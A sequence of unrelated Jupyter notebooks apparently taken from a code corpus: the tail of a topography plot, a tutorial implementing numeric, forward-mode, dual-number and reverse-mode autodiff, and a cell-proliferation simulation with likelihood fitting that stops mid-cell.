    colorbar=False, hover=False, groupby='out'
)
# Topography cross-sections at three y positions across the domain.
ysections = out_ds.topography__elevation.sel(y=[2.5e3, 5e3, 7.5e3])
sections_plot = ysections.hvplot.line(
    by='y', groupby='out', ylim=(0, 1100),
    height=200, legend='top_left',
)
# Stack the overlaid map above the cross-section plot.
hv.Layout((erosion_plot * hillshade_plot) + sections_plot).cols(1)
```
| github_jupyter |
**Appendix D – Autodiff**
_This notebook contains toy implementations of various autodiff techniques, to explain how they work._
# Setup
# Introduction
Suppose we want to compute the gradients of the function $f(x,y)=x^2y + y + 2$ with regards to the parameters x and y:
```
def f(x, y):
    """Evaluate f(x, y) = x²y + y + 2 at the given point."""
    x_squared_y = x * x * y
    return x_squared_y + y + 2
```
One approach is to solve this analytically:
$\dfrac{\partial f}{\partial x} = 2xy$
$\dfrac{\partial f}{\partial y} = x^2 + 1$
```
def df(x, y):
    """Analytic partial derivatives of f: (∂f/∂x, ∂f/∂y) = (2xy, x² + 1)."""
    partial_x = 2 * x * y
    partial_y = x * x + 1
    return partial_x, partial_y
```
So for example $\dfrac{\partial f}{\partial x}(3,4) = 24$ and $\dfrac{\partial f}{\partial y}(3,4) = 10$.
```
df(3, 4)
```
Perfect! We can also find the equations for the second order derivatives (also called Hessians):
$\dfrac{\partial^2 f}{\partial x \partial x} = \dfrac{\partial (2xy)}{\partial x} = 2y$
$\dfrac{\partial^2 f}{\partial x \partial y} = \dfrac{\partial (2xy)}{\partial y} = 2x$
$\dfrac{\partial^2 f}{\partial y \partial x} = \dfrac{\partial (x^2 + 1)}{\partial x} = 2x$
$\dfrac{\partial^2 f}{\partial y \partial y} = \dfrac{\partial (x^2 + 1)}{\partial y} = 0$
At x=3 and y=4, these Hessians are respectively 8, 6, 6, 0. Let's use the equations above to compute them:
```
def d2f(x, y):
    """Analytic Hessian of f as two rows: [[2y, 2x], [2x, 0]]."""
    row_x = [2 * y, 2 * x]
    row_y = [2 * x, 0]
    return row_x, row_y
d2f(3, 4)
```
Perfect, but this requires some mathematical work. It is not too hard in this case, but for a deep neural network, it is practically impossible to compute the derivatives this way. So let's look at various ways to automate this!
# Numeric differentiation
Here, we compute an approximation of the gradients using the equation: $\dfrac{\partial f}{\partial x} = \displaystyle{\lim_{\epsilon \to 0}}\dfrac{f(x+\epsilon, y) - f(x, y)}{\epsilon}$ (and there is a similar definition for $\dfrac{\partial f}{\partial y}$).
```
def gradients(func, vars_list, eps=0.0001):
    """Approximate ∂func/∂v for each variable in `vars_list`.

    Uses one-sided (forward) finite differences with step `eps`;
    returns the partial derivatives as a list, one per variable.
    """
    base_value = func(*vars_list)
    partials = []
    for index, _ in enumerate(vars_list):
        bumped = list(vars_list)
        bumped[index] += eps  # perturb exactly one variable
        partials.append((func(*bumped) - base_value) / eps)
    return partials
def df(x, y):
    """Numerically approximate (∂f/∂x, ∂f/∂y) at (x, y) via `gradients`."""
    return gradients(f, [x, y])
df(3, 4)
```
It works well!
The good news is that it is pretty easy to compute the Hessians. First let's create functions that compute the first order derivatives (also called Jacobians):
```
def dfdx(x, y):
    """Numeric first partial ∂f/∂x at (x, y)."""
    return gradients(f, [x,y])[0]

def dfdy(x, y):
    """Numeric first partial ∂f/∂y at (x, y)."""
    return gradients(f, [x,y])[1]
dfdx(3., 4.), dfdy(3., 4.)
```
Now we can simply apply the `gradients()` function to these functions:
```
def d2f(x, y):
    """Numerically approximate the Hessian of f at (x, y).

    Differentiates the numeric Jacobian components dfdx and dfdy.
    Fix: the original hard-coded the point [3., 4.], silently ignoring
    the `x` and `y` arguments; differentiate at the point passed in.
    """
    return [gradients(dfdx, [x, y]), gradients(dfdy, [x, y])]
d2f(3, 4)
```
So everything works well, but the result is approximate, and computing the gradients of a function with regards to $n$ variables requires calling that function $n$ times. In deep neural nets, there are often thousands of parameters to tweak using gradient descent (which requires computing the gradients of the loss function with regards to each of these parameters), so this approach would be much too slow.
## Implementing a Toy Computation Graph
Rather than this numerical approach, let's implement some symbolic autodiff techniques. For this, we will need to define classes to represent constants, variables and operations.
```
class Const(object):
    """Leaf node holding a constant value."""

    def __init__(self, value):
        self.value = value

    def evaluate(self):
        return self.value

    def __str__(self):
        return str(self.value)


class Var(object):
    """Named variable leaf node; assign `.value` before evaluating the graph."""

    def __init__(self, name, init_value=0):
        self.value = init_value
        self.name = name

    def evaluate(self):
        return self.value

    def __str__(self):
        return self.name


class BinaryOperator(object):
    """Base class storing the two operand subgraphs of a binary operation."""

    def __init__(self, a, b):
        self.a = a
        self.b = b


class Add(BinaryOperator):
    """Addition node: evaluates to a + b."""

    def evaluate(self):
        return self.a.evaluate() + self.b.evaluate()

    def __str__(self):
        return f"{self.a} + {self.b}"


class Mul(BinaryOperator):
    """Multiplication node: evaluates to a * b."""

    def evaluate(self):
        return self.a.evaluate() * self.b.evaluate()

    def __str__(self):
        return f"({self.a}) * ({self.b})"
```
Good, now we can build a computation graph to represent the function $f$:
```
x = Var("x")
y = Var("y")
f = Add(Mul(Mul(x, x), y), Add(y, Const(2))) # f(x,y) = x²y + y + 2
```
And we can run this graph to compute $f$ at any point, for example $f(3, 4)$.
```
x.value = 3
y.value = 4
f.evaluate()
```
Perfect, it found the ultimate answer.
## Computing gradients
The autodiff methods we will present below are all based on the *chain rule*.
Suppose we have two functions $u$ and $v$, and we apply them sequentially to some input $x$, and we get the result $z$. So we have $z = v(u(x))$, which we can rewrite as $z = v(s)$ and $s = u(x)$. Now we can apply the chain rule to get the partial derivative of the output $z$ with regards to the input $x$:
$ \dfrac{\partial z}{\partial x} = \dfrac{\partial s}{\partial x} \cdot \dfrac{\partial z}{\partial s}$
Now if $z$ is the output of a sequence of functions which have intermediate outputs $s_1, s_2, ..., s_n$, the chain rule still applies:
$ \dfrac{\partial z}{\partial x} = \dfrac{\partial s_1}{\partial x} \cdot \dfrac{\partial s_2}{\partial s_1} \cdot \dfrac{\partial s_3}{\partial s_2} \cdot \dots \cdot \dfrac{\partial s_{n-1}}{\partial s_{n-2}} \cdot \dfrac{\partial s_n}{\partial s_{n-1}} \cdot \dfrac{\partial z}{\partial s_n}$
In forward mode autodiff, the algorithm computes these terms "forward" (i.e., in the same order as the computations required to compute the output $z$), that is from left to right: first $\dfrac{\partial s_1}{\partial x}$, then $\dfrac{\partial s_2}{\partial s_1}$, and so on. In reverse mode autodiff, the algorithm computes these terms "backwards", from right to left: first $\dfrac{\partial z}{\partial s_n}$, then $\dfrac{\partial s_n}{\partial s_{n-1}}$, and so on.
For example, suppose you want to compute the derivative of the function $z(x)=\sin(x^2)$ at x=3, using forward mode autodiff. The algorithm would first compute the partial derivative $\dfrac{\partial s_1}{\partial x}=\dfrac{\partial x^2}{\partial x}=2x=6$. Next, it would compute $\dfrac{\partial z}{\partial x}=\dfrac{\partial s_1}{\partial x}\cdot\dfrac{\partial z}{\partial s_1}= 6 \cdot \dfrac{\partial \sin(s_1)}{\partial s_1}=6 \cdot \cos(s_1)=6 \cdot \cos(3^2)\approx-5.46$.
Let's verify this result using the `gradients()` function defined earlier:
```
from math import sin
def z(x):
    """Return sin(x²) — the demo function for forward/reverse-mode autodiff."""
    squared = x ** 2
    return sin(squared)
gradients(z, [3])
```
Looks good. Now let's do the same thing using reverse mode autodiff. This time the algorithm would start from the right hand side so it would compute $\dfrac{\partial z}{\partial s_1} = \dfrac{\partial \sin(s_1)}{\partial s_1}=\cos(s_1)=\cos(3^2)\approx -0.91$. Next it would compute $\dfrac{\partial z}{\partial x}=\dfrac{\partial s_1}{\partial x}\cdot\dfrac{\partial z}{\partial s_1} \approx \dfrac{\partial s_1}{\partial x} \cdot -0.91 = \dfrac{\partial x^2}{\partial x} \cdot -0.91=2x \cdot -0.91 = 6\cdot-0.91=-5.46$.
Of course both approaches give the same result (except for rounding errors), and with a single input and output they involve the same number of computations. But when there are several inputs or outputs, they can have very different performance. Indeed, if there are many inputs, the right-most terms will be needed to compute the partial derivatives with regards to each input, so it is a good idea to compute these right-most terms first. That means using reverse-mode autodiff. This way, the right-most terms can be computed just once and used to compute all the partial derivatives. Conversely, if there are many outputs, forward-mode is generally preferable because the left-most terms can be computed just once to compute the partial derivatives of the different outputs. In Deep Learning, there are typically thousands of model parameters, meaning there are lots of inputs, but few outputs. In fact, there is generally just one output during training: the loss. This is why reverse mode autodiff is used in TensorFlow and all major Deep Learning libraries.
There's one additional complexity in reverse mode autodiff: the value of $s_i$ is generally required when computing $\dfrac{\partial s_{i+1}}{\partial s_i}$, and computing $s_i$ requires first computing $s_{i-1}$, which requires computing $s_{i-2}$, and so on. So basically, a first pass forward through the network is required to compute $s_1$, $s_2$, $s_3$, $\dots$, $s_{n-1}$ and $s_n$, and then the algorithm can compute the partial derivatives from right to left. Storing all the intermediate values $s_i$ in RAM is sometimes a problem, especially when handling images, and when using GPUs which often have limited RAM: to limit this problem, one can reduce the number of layers in the neural network, or configure TensorFlow to make it swap these values from GPU RAM to CPU RAM. Another approach is to only cache every other intermediate value, $s_1$, $s_3$, $s_5$, $\dots$, $s_{n-4}$, $s_{n-2}$ and $s_n$. This means that when the algorithm computes the partial derivatives, if an intermediate value $s_i$ is missing, it will need to recompute it based on the previous intermediate value $s_{i-1}$. This trades off CPU for RAM (if you are interested, check out [this paper](https://pdfs.semanticscholar.org/f61e/9fd5a4878e1493f7a6b03774a61c17b7e9a4.pdf)).
### Forward mode autodiff
```
Const.gradient = lambda self, var: Const(0)
Var.gradient = lambda self, var: Const(1) if self is var else Const(0)
Add.gradient = lambda self, var: Add(self.a.gradient(var), self.b.gradient(var))
Mul.gradient = lambda self, var: Add(Mul(self.a, self.b.gradient(var)), Mul(self.a.gradient(var), self.b))
x = Var(name="x", init_value=3.)
y = Var(name="y", init_value=4.)
f = Add(Mul(Mul(x, x), y), Add(y, Const(2))) # f(x,y) = x²y + y + 2
dfdx = f.gradient(x) # 2xy
dfdy = f.gradient(y) # x² + 1
dfdx.evaluate(), dfdy.evaluate()
```
Since the output of the `gradient()` method is fully symbolic, we are not limited to the first order derivatives, we can also compute second order derivatives, and so on:
```
d2fdxdx = dfdx.gradient(x) # 2y
d2fdxdy = dfdx.gradient(y) # 2x
d2fdydx = dfdy.gradient(x) # 2x
d2fdydy = dfdy.gradient(y) # 0
[[d2fdxdx.evaluate(), d2fdxdy.evaluate()],
[d2fdydx.evaluate(), d2fdydy.evaluate()]]
```
Note that the result is now exact, not an approximation (up to the limit of the machine's float precision, of course).
### Forward mode autodiff using dual numbers
A nice way to apply forward mode autodiff is to use [dual numbers](https://en.wikipedia.org/wiki/Dual_number). In short, a dual number $z$ has the form $z = a + b\epsilon$, where $a$ and $b$ are real numbers, and $\epsilon$ is an infinitesimal number, positive but smaller than all real numbers, and such that $\epsilon^2=0$.
It can be shown that $f(x + \epsilon) = f(x) + \dfrac{\partial f}{\partial x}\epsilon$, so simply by computing $f(x + \epsilon)$ we get both the value of $f(x)$ and the partial derivative of $f$ with regards to $x$.
Dual numbers have their own arithmetic rules, which are generally quite natural. For example:
**Addition**
$(a_1 + b_1\epsilon) + (a_2 + b_2\epsilon) = (a_1 + a_2) + (b_1 + b_2)\epsilon$
**Subtraction**
$(a_1 + b_1\epsilon) - (a_2 + b_2\epsilon) = (a_1 - a_2) + (b_1 - b_2)\epsilon$
**Multiplication**
$(a_1 + b_1\epsilon) \times (a_2 + b_2\epsilon) = (a_1 a_2) + (a_1 b_2 + a_2 b_1)\epsilon + b_1 b_2\epsilon^2 = (a_1 a_2) + (a_1b_2 + a_2b_1)\epsilon$
**Division**
$\dfrac{a_1 + b_1\epsilon}{a_2 + b_2\epsilon} = \dfrac{a_1 + b_1\epsilon}{a_2 + b_2\epsilon} \cdot \dfrac{a_2 - b_2\epsilon}{a_2 - b_2\epsilon} = \dfrac{a_1 a_2 + (b_1 a_2 - a_1 b_2)\epsilon - b_1 b_2\epsilon^2}{{a_2}^2 + (a_2 b_2 - a_2 b_2)\epsilon - {b_2}^2\epsilon} = \dfrac{a_1}{a_2} + \dfrac{a_1 b_2 - b_1 a_2}{{a_2}^2}\epsilon$
**Power**
$(a + b\epsilon)^n = a^n + (n a^{n-1}b)\epsilon$
etc.
Let's create a class to represent dual numbers, and implement a few operations (addition and multiplication). You can try adding some more if you want.
```
class DualNumber(object):
    """A dual number a + bε with ε² = 0, used for forward-mode autodiff.

    `value` is the real part a; `eps` is the infinitesimal coefficient b.
    Plain numbers mix freely in arithmetic via the `to_dual` coercion.
    """

    def __init__(self, value=0.0, eps=0.0):
        self.value = value
        self.eps = eps

    def __add__(self, b):
        # (a1 + b1ε) + (a2 + b2ε) = (a1 + a2) + (b1 + b2)ε
        other = self.to_dual(b)
        return DualNumber(self.value + other.value, self.eps + other.eps)

    def __radd__(self, a):
        return self.to_dual(a).__add__(self)

    def __mul__(self, b):
        # (a1 + b1ε)(a2 + b2ε) = a1a2 + (a1b2 + a2b1)ε   (the ε² term vanishes)
        other = self.to_dual(b)
        return DualNumber(self.value * other.value,
                          self.eps * other.value + self.value * other.eps)

    def __rmul__(self, a):
        return self.to_dual(a).__mul__(self)

    def __str__(self):
        if self.eps:
            return f"{self.value:.1f} + {self.eps:.1f}ε"
        return f"{self.value:.1f}"

    def __repr__(self):
        return str(self)

    @classmethod
    def to_dual(cls, n):
        """Coerce `n` to a dual number; objects exposing `.value` pass through unchanged."""
        return n if hasattr(n, "value") else cls(n)
```
$3 + (3 + 4 \epsilon) = 6 + 4\epsilon$
```
3 + DualNumber(3, 4)
```
$(3 + 4ε)\times(5 + 7ε)$ = $3 \times 5 + 3 \times 7ε + 4ε \times 5 + 4ε \times 7ε$ = $15 + 21ε + 20ε + 28ε^2$ = $15 + 41ε + 28 \times 0$ = $15 + 41ε$
```
DualNumber(3, 4) * DualNumber(5, 7)
```
Now let's see if the dual numbers work with our toy computation framework:
```
x.value = DualNumber(3.0)
y.value = DualNumber(4.0)
f.evaluate()
```
Yep, sure works. Now let's use this to compute the partial derivatives of $f$ with regards to $x$ and $y$ at x=3 and y=4:
```
x.value = DualNumber(3.0, 1.0) # 3 + ε
y.value = DualNumber(4.0) # 4
dfdx = f.evaluate().eps
x.value = DualNumber(3.0) # 3
y.value = DualNumber(4.0, 1.0) # 4 + ε
dfdy = f.evaluate().eps
dfdx
dfdy
```
Great! However, in this implementation we are limited to first order derivatives.
Now let's look at reverse mode.
### Reverse mode autodiff
Let's rewrite our toy framework to add reverse mode autodiff:
```
class Const(object):
    """Constant node: evaluates to a fixed value and absorbs gradients."""

    def __init__(self, value):
        self.value = value

    def evaluate(self):
        return self.value

    def backpropagate(self, gradient):
        # Constants have no parameters; nothing to accumulate.
        pass

    def __str__(self):
        return str(self.value)


class Var(object):
    """Variable node: accumulates its partial derivative in `.gradient`."""

    def __init__(self, name, init_value=0):
        self.value = init_value
        self.name = name
        self.gradient = 0

    def evaluate(self):
        return self.value

    def backpropagate(self, gradient):
        # A variable can appear several times in the graph; sum the contributions.
        self.gradient += gradient

    def __str__(self):
        return self.name


class BinaryOperator(object):
    """Base class storing the two operand subgraphs."""

    def __init__(self, a, b):
        self.a = a
        self.b = b


class Add(BinaryOperator):
    """Addition node; d(a+b)/da = d(a+b)/db = 1."""

    def evaluate(self):
        self.value = self.a.evaluate() + self.b.evaluate()
        return self.value

    def backpropagate(self, gradient):
        # The upstream gradient flows unchanged into both operands.
        self.a.backpropagate(gradient)
        self.b.backpropagate(gradient)

    def __str__(self):
        return f"{self.a} + {self.b}"


class Mul(BinaryOperator):
    """Multiplication node; d(ab)/da = b and d(ab)/db = a."""

    def evaluate(self):
        self.value = self.a.evaluate() * self.b.evaluate()
        return self.value

    def backpropagate(self, gradient):
        # Uses the operand values cached by evaluate(), which must run first.
        self.a.backpropagate(gradient * self.b.value)
        self.b.backpropagate(gradient * self.a.value)

    def __str__(self):
        return f"({self.a}) * ({self.b})"
x = Var("x", init_value=3)
y = Var("y", init_value=4)
f = Add(Mul(Mul(x, x), y), Add(y, Const(2)))  # f(x,y) = x²y + y + 2
result = f.evaluate()  # forward pass caches each node's value
f.backpropagate(1.0)  # reverse pass, seeded with df/df = 1
print(f)
result
x.gradient  # ∂f/∂x accumulated during backpropagation
y.gradient  # ∂f/∂y accumulated during backpropagation
```
Again, in this implementation the outputs are just numbers, not symbolic expressions, so we are limited to first order derivatives. However, we could have made the `backpropagate()` methods return symbolic expressions rather than values (e.g., return `Add(2,3)` rather than 5). This would make it possible to compute second order gradients (and beyond). This is what TensorFlow does, as do all the major libraries that implement autodiff.
### Reverse mode autodiff using TensorFlow
```
import tensorflow as tf
# NOTE(review): TF1 graph-mode API (reset_default_graph / Session); under
# TF2 this cell needs tf.compat.v1 — confirm the installed version.
tf.reset_default_graph()
x = tf.Variable(3., name="x")
y = tf.Variable(4., name="y")
f = x*x*y + y + 2
jacobians = tf.gradients(f, [x, y])  # symbolic reverse-mode gradients
init = tf.global_variables_initializer()
with tf.Session() as sess:
    init.run()
    f_val, jacobians_val = sess.run([f, jacobians])
f_val, jacobians_val
```
Since everything is symbolic, we can compute second order derivatives, and beyond. However, when we compute the derivative of a tensor with regards to a variable that it does not depend on, instead of returning 0.0, the `gradients()` function returns None, which cannot be evaluated by `sess.run()`. So beware of `None` values. Here we just replace them with zero tensors.
```
# Second-order gradients: differentiate each Jacobian component again.
hessians_x = tf.gradients(jacobians[0], [x, y])
hessians_y = tf.gradients(jacobians[1], [x, y])
def replace_none_with_zero(tensors):
    """Replace None entries (gradient of an unrelated variable) with 0-tensors so sess.run can evaluate them."""
    return [tensor if tensor is not None else tf.constant(0.)
            for tensor in tensors]
hessians_x = replace_none_with_zero(hessians_x)
hessians_y = replace_none_with_zero(hessians_y)
init = tf.global_variables_initializer()
with tf.Session() as sess:
    init.run()
    hessians_x_val, hessians_y_val = sess.run([hessians_x, hessians_y])
hessians_x_val, hessians_y_val
```
And that's all folks! Hope you enjoyed this notebook.
| github_jupyter |
```
import numpy as np
import scipy as sp
import pandas as pd
import warnings
import cython
%load_ext Cython
from iminuit import Minuit
idx = pd.IndexSlice
import matplotlib.pyplot as plt
%matplotlib inline
import clapy
import clasim
# Simulation arguments for clasim.
# NOTE(review): meanings inferred from names — G1/S/G2M look like cell-cycle
# phase durations and GF a growth fraction; confirm against the clasim docs.
dargs = {
    'nCells': 10000,
    'mCells': 100,
    'GF': 0.95,
    'G1': 0.46,
    'S': 0.33,
    'G2M': 0.21,
    'sCells' : 0.3,
    'sSamples' : 0.2
}
# One exploratory run with a random seed at t = 0.
a = clasim.run(seed=int(np.random.rand()*1000),mode=5,times=[0.0],samples=1000,**dargs)
```
# Data for time series and histograms
```
# Analytic distributions (plain and gamma variants) from clapy.
asym_dist = clapy.dist()
asym_dist_gamma = clapy.dist_gamma()
dargs = {
    'samples': 10000,
    'nCells': 100,
    'mCells': 100,
    'GF': 0.95,
    'G1': 0.46,
    'S': 0.33,
    'G2M': 0.21,
    'sCells' : 0.3,
    'sSamples' : 0.2
}
# "_d" variants: noise scales set to ~0 (deterministic comparison runs).
dargs_d = dargs.copy()
dargs_d['sSamples'] = 1e-6
dargs_d['sCells'] = 1e-6
# "sym" variants: larger population for the symmetric-division mode.
dargs_sym = dargs.copy()
dargs_sym['nCells'] = 10000
dargs_sym_d = dargs_sym.copy()
dargs_sym_d['sSamples'] = 1e-6
dargs_sym_d['sCells'] = 1e-6
dTC = dargs['G1']+dargs['G2M']+dargs['S']  # total cycle duration
dFS = dargs['S']/dTC  # fraction of the cycle spent in S phase
X = np.arange(0,dargs['mCells']+1)  # histogram support: 0..mCells labelled cells
time_points = np.linspace(0.01,1.965625,22)
measure_times = np.ravel(np.array(time_points)[:,np.newaxis]*np.ones(dargs['samples']))
pdfs = list()
pdfm = list()
pdfstd = list()
pdfskw = list()
pdfs_gamma = list()
pdfm_gamma = list()
pdfstd_gamma = list()
pdfskw_gamma = list()
data_asy = list()
data_sym = list()
data_asy_d = list()
data_sym_d = list()
for t in time_points:
    # simulations, asymmetric division (mode=1), with and without noise
    data_asy.append(np.array(clasim.run(seed=int(np.random.rand()*1000),mode=1,times=[t],**dargs)) )
    data_asy_d.append(np.array(clasim.run(seed=int(np.random.rand()*1000),mode=1,times=[t],**dargs_d)) )
    # simulations, symmetric division (mode=2)
    data_sym.append(np.array(clasim.run(seed=int(np.random.rand()*1000),mode=2,times=[t],**dargs_sym)) )
    data_sym_d.append(np.array(clasim.run(seed=int(np.random.rand()*1000),mode=2,times=[t],**dargs_sym_d)) )
    # analytic pmf evaluated over the full support
    pdfs.append( [asym_dist.pmf_f(dargs['mCells'],dTC,dFS,dargs['GF'],dargs['sCells'],dargs['sSamples'],t,i) for i in X] )
    # analytic moments (mean, std, skew)
    pdfm.append( asym_dist.pmf_mean(dargs['mCells'],dTC,dFS,dargs['GF'],dargs['sCells'],dargs['sSamples'],t) )
    pdfstd.append( asym_dist.pmf_std(dargs['mCells'],dTC,dFS,dargs['GF'],dargs['sCells'],dargs['sSamples'],t) )
    pdfskw.append( asym_dist.pmf_skw(dargs['mCells'],dTC,dFS,dargs['GF'],dargs['sCells'],dargs['sSamples'],t) )
    # same quantities for the gamma-based distribution
    pdfs_gamma.append( [asym_dist_gamma.pmf_f(dargs['mCells'],dTC,dFS,dargs['GF'],dargs['sCells'],dargs['sSamples'],t,i) for i in X] )
    pdfm_gamma.append( asym_dist_gamma.pmf_mean(dargs['mCells'],dTC,dFS,dargs['GF'],dargs['sCells'],dargs['sSamples'],t) )
    pdfstd_gamma.append( asym_dist_gamma.pmf_std(dargs['mCells'],dTC,dFS,dargs['GF'],dargs['sCells'],dargs['sSamples'],t) )
    pdfskw_gamma.append( asym_dist_gamma.pmf_skw(dargs['mCells'],dTC,dFS,dargs['GF'],dargs['sCells'],dargs['sSamples'],t) )
# Persist everything to a compressed HDF store for later plotting.
with pd.HDFStore('data2.pandas',complevel=9) as st:
    st['data_asy'] = pd.Series(data_asy,index=time_points,name='simulation asy')
    st['data_sym'] = pd.Series(data_sym,index=time_points,name='simulation sym')
    st['data_asy_d'] = pd.Series(data_asy_d,index=time_points,name='simulation asy no nois')
    st['data_sym_d'] = pd.Series(data_sym_d,index=time_points,name='simulation sym no nois')
    st['X'] = pd.Series(X,name='points for histogram')
    st['pdfs'] = pd.Series(pdfs,index=time_points,name='pdf')
    st['pdfm'] = pd.Series(pdfm,index=time_points,name='mean')
    st['pdfstd'] = pd.Series(pdfstd,index=time_points,name='std')
    st['pdfskw'] = pd.Series(pdfskw,index=time_points,name='skw')
    st['pdfs_gamma'] = pd.Series(pdfs_gamma,index=time_points,name='pdf gamma')
    st['pdfm_gamma'] = pd.Series(pdfm_gamma,index=time_points,name='mean gamma')
    st['pdfstd_gamma'] = pd.Series(pdfstd_gamma,index=time_points,name='std gamma')
    st['pdfskw_gamma'] = pd.Series(pdfskw_gamma,index=time_points,name='skw gamma')
```
# Generate data for parameter recovery
```
%%cython --force
# distutils: language = c++
#use --annotate if you wonder what kind of code it generates
cimport cython
import numpy as np
cimport numpy as np #overwritten those from python with cython
from libc.math cimport exp, M_PI, sqrt, log
from iminuit.util import describe, make_func_code
from libcpp.map cimport map
import scipy as sp
# Piecewise-linear model of the labelled fraction over time: rises with slope
# GF/Tc until the plateau GF is reached at t = Tc - Tc*r.
@cython.embedsignature(True)  # dump the signature so describe works
cpdef fitfunc(double t,double Tc,double r,double GF):
    cdef double res = 0
    if t<(Tc-Tc*r):
        res = GF/Tc*(t+Tc*r)
    else:
        res = GF
    return res
'''
@cython.embedsignature(True)#dump the signatre so describe works
cpdef double mypdf(double x, double mu, double std):
#cpdef means generate both c function and python function
cdef double norm = 1./(sqrt(2*M_PI*std))
cdef double ret = exp(-1*(x-mu)*(x-mu)/(2.*std))*norm
return ret
'''
@cython.embedsignature(True)  # dump the signature so iminuit's describe() works
cpdef double mypdfln(double x, double mu, double std):
    """Log-density of a normal distribution N(mu, std) evaluated at x."""
    # cpdef emits both a fast C-level function and a Python-callable wrapper.
    cdef double diff = x - mu
    cdef double norm = sqrt(2*M_PI*std*std)
    return -diff*diff/(2.*std*std) - log(norm)
cdef class Nowakowski_LH:
    """Negative log-likelihood for the simple ("Nowakowski") labelling model:
    Gaussian noise of width ``s`` around the piecewise-linear ``fitfunc``.
    ``compute`` is meant to be handed to iminuit as the cost function."""
    cdef np.ndarray data   # observed labelled fractions (double array)
    cdef np.ndarray err    # NOTE(review): declared but never used below
    cdef np.ndarray t      # measurement time of each data point
    cdef int ndata         # number of data points
    def __init__(self,data,t):
        self.data = data
        self.t = t
        self.ndata = len(data)
    @cython.embedsignature(True)#you need this to dump function signature in docstring
    def compute(self, double Tc,double r,double GF,double s):
        """Return the negative log-likelihood of the data for (Tc, r, GF, s)."""
        #this line is a cast not a copy. Let cython knows mydata will spit out double
        cdef np.ndarray[np.double_t, ndim=1] mydata = self.data
        cdef np.ndarray[np.double_t, ndim=1] myt = self.t
        cdef double loglh = 0.
        cdef double lmu = 0.
        cdef double ler = 0.
        for i in range(self.ndata):
            # model prediction at this time point, compared against the datum
            lmu = fitfunc(myt[i],Tc,r,GF)
            loglh -= mypdfln(mydata[i],lmu,s)
        return loglh
```
## with 5 samples
```
def do_old(num):
    """Fit the Gaussian-noise ("old") model to one simulated data set.

    num indexes the replica: it seeds the simulator (seed=3*num, disjoint from
    the seeds used by do_gamma/do_lognorm) and names the returned Series.
    Relies on the globals clasim, default_args, times and calc_error.
    Returns a pd.Series with fitted values, parabolic errors and, when
    calc_error is set, 2-sigma MINOS interval bounds.
    """
    data = np.array(clasim.run(seed=3*num,mode=1,**default_args))
    # normalise counts to fractions of the total cell number
    lh = Nowakowski_LH(data*1.0/default_args['mCells'],times)
    #lh.compute(0.4,5,3)
    mi_old = Minuit(lh.compute, Tc=1.0, r=0.3,GF=0.95,s=0.2,\
                    error_s=0.1,error_r=0.1,error_GF=0.1,error_Tc=0.1,\
                    limit_Tc=(0,2), limit_r=(0,1),limit_GF=(0,1),limit_s=(0,1),\
                    errordef=0.5,print_level=0)  # errordef=0.5: negative log-likelihood
    mi_old.migrad(ncall=999999999);
    s = dict(mi_old.values)
    for ii in mi_old.errors:
        s.update({ii+"_error" : mi_old.errors[ii]})
    s.update({'model' : 'old'})
    if calc_error:
        try:
            tmp = mi_old.minos(sigma=2)
            for i in tmp:
                # convert MINOS offsets to absolute interval bounds
                s.update({i+'_hpd46_l' : tmp[i]['lower'] + mi_old.values[i] })
                s.update({i+'_hpd46_u' : tmp[i]['upper'] + mi_old.values[i] })
        except Exception:  # was a bare except: let KeyboardInterrupt/SystemExit propagate
            print('error in errorfind',s['model'])
    return pd.Series(s,name=num)
def do_gamma(num):
    """Fit the gamma-noise model to one simulated data set.

    num indexes the replica: it seeds the simulator (seed=3*num+1, disjoint
    from the other models' seeds) and names the returned Series.
    Relies on the globals clasim, clapy, default_args, times and calc_error.
    Returns a pd.Series with fitted values, parabolic errors and, when
    calc_error is set, 2-sigma MINOS interval bounds.
    """
    data = np.array(clasim.run(seed=3*num+1,mode=1,**default_args))
    lh = clapy.asym_lhgamma(data=data,times=times,ncell=default_args['mCells'])
    mi_old = Minuit(lh.compute, Tc=1.0, r=0.3,GF=0.95,sigma_cell=0.3,sigma_sample=0.2,\
                    error_sigma_cell=0.1,error_r=0.1,error_GF=0.1,error_Tc=0.1,error_sigma_sample=0.1,\
                    limit_Tc=(0.00001,2), limit_r=(0.00001,1),limit_GF=(0,1),limit_sigma_cell=(0.00001,1),limit_sigma_sample=(0.00001,1),\
                    errordef=0.5,print_level=0)  # errordef=0.5: negative log-likelihood
    mi_old.migrad();
    s = dict(mi_old.values)
    for ii in mi_old.errors:
        s.update({ii+"_error" : mi_old.errors[ii]})
    s.update({'model' : 'gamma'})
    if calc_error:
        try:
            tmp = mi_old.minos(sigma=2)
            for i in tmp:
                # convert MINOS offsets to absolute interval bounds
                s.update({i+'_hpd46_l' : tmp[i]['lower'] + mi_old.values[i] })
                s.update({i+'_hpd46_u' : tmp[i]['upper'] + mi_old.values[i] })
        except Exception:  # was a bare except: let KeyboardInterrupt/SystemExit propagate
            print('error in errorfind',s['model'])
    return pd.Series(s,name=num)
def do_lognorm(num):
    """Fit the lognormal-noise model to one simulated data set.

    num indexes the replica: it seeds the simulator (seed=3*num+2, disjoint
    from the other models' seeds) and names the returned Series.
    Relies on the globals clasim, clapy, default_args, times and calc_error.
    Returns a pd.Series with fitted values, parabolic errors and, when
    calc_error is set, 2-sigma MINOS interval bounds.
    """
    data = np.array(clasim.run(seed=3*num+2,mode=1,**default_args))
    lh = clapy.asym_lh(data=data,times=times,ncell=default_args['mCells'])
    mi_old = Minuit(lh.compute, Tc=1.0, r=0.3,GF=0.95,sigma_cell=0.3,sigma_sample=0.2,\
                    error_sigma_cell=0.1,error_r=0.1,error_GF=0.1,error_Tc=0.1,error_sigma_sample=0.1,\
                    limit_Tc=(0.00001,2), limit_r=(0.00001,1),limit_GF=(0,1),limit_sigma_cell=(0.00001,1),limit_sigma_sample=(0.00001,1),\
                    errordef=0.5,print_level=0)  # errordef=0.5: negative log-likelihood
    mi_old.migrad();
    s = dict(mi_old.values)
    for ii in mi_old.errors:
        s.update({ii+"_error" : mi_old.errors[ii]})
    s.update({'model' : 'lognorm'})
    if calc_error:
        try:
            tmp = mi_old.minos(sigma=2)
            for i in tmp:
                # convert MINOS offsets to absolute interval bounds
                s.update({i+'_hpd46_l' : tmp[i]['lower'] + mi_old.values[i] })
                s.update({i+'_hpd46_u' : tmp[i]['upper'] + mi_old.values[i] })
        except Exception:  # was a bare except: let KeyboardInterrupt/SystemExit propagate
            print('error in errorfind',s['model'])
    return pd.Series(s,name=num)
from multiprocessing import Pool
# Scenario: 5 samples per time point, 100 cells. Fit all three models on
# Ns independent simulated replicas each and store the results.
default_args = {
